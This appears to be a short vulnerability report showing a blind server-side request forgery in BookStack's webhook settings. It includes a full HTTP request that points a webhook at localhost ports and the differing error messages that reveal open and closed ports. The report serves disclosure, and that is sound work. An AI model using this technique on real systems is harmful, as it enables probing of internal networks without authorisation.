It is possible to access the local environment in the Webhook function.
Therefore, Blind SSRF makes it possible to perform a port scan against the local environment.
After logging in, access the webhook setting page, specify the URL with the following pattern, and check that you can access the local environment from the message difference.
Open Port
http://localhost:80
Closed Port
http://localhost:1234
POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
...
_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all
Open Port
Response status from endpoint was 405
Closed Port
cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/
https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link